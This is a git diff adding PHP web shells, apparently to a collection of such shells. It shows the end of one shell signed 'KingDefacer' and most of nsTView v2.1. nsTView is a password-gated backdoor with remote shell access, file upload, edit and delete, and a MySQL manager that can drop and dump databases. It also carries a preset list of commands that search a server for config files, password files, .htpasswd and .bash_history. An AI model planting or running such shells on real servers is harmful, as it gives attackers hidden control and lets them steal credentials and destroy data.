+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- :: Edited By KingDefacer :: --!>
diff --git a/php/nstview.php b/php/nstview.php
new file mode 100644
index 0000000..4ecf4bb
--- /dev/null
+++ b/php/nstview.php
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
